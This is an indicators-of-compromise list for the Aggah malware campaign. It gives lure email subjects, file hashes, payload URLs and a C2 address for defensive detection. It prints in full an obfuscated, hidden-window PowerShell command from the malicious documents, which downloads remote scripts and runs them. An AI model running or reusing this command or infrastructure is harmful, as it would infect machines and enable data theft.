2021-10-27 Aggah IOCs
THREAT IDENTIFICATION: AGGAH / HAGGA
SUBJECTS OBSERVED
Order shipping address
REQUEST FOR QUOTE -16126
SENDERS OBSERVED
MALDOC FILE HASHES
REQUEST FOR QUOTE -16126,pdf.ppam
c336c07a6bc7c1fd729611a4fbc07876
13 (1).zip
c48aaaeb067bc33d1ec2c1ac21093b26
Which contains:
13.ppam
03bbdcead22e9329a234dc39f55f0a2b
POWERSHELL FROM MALDOCS
"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_69d42a6ec0d74e3f8752710c7ad14fd9.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_86d4dc912a7d4ea2ae5d2599c31c5d1f.txt').GetResponse().GetResponseStream()).ReadToend());
AGGAH PAYLOAD STAGING URLS
https://www.bitly.com/kddjdkdkwokwdokii
https://ajsjwdijwidjwdidwj.blogspot.com/p/17.html
AGGAH PAYLOAD DOWNLOAD URLS
https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_69d42a6ec0d74e3f8752710c7ad14fd9.txt
https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_86d4dc912a7d4ea2ae5d2599c31c5d1f.txt
AGGAH PAYLOAD FILE HASHES
aggah2.exe
4425f4efa71c8709a2666d4478f382ce
aggah1.exe
ea85e3fe98d1519f2434b0f24e240c3a
AGGAH C2
http://103.125.190.248/j/p17r/mawa/e6a2101b1d3a47e18c7f.php